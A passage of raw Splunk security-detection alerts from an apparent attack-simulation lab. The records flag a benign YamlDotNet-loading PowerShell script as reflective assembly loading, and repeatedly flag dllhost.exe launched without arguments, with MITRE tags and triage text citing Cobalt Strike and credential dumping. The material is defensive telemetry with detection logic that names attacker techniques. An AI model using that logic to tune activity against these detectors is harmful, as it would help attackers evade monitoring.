\"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665010532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T21:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T21:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="22100", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="18824", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="17240", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="1060", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5654", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4988", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x4358", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665003600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665003600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x424", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="21812", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="14232", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="13760", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x55d0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x5534", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x3798", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on exchange01.attackrange.local by $user$", risk_object="exchange01.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1665000000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1665000000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="exchange01.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", 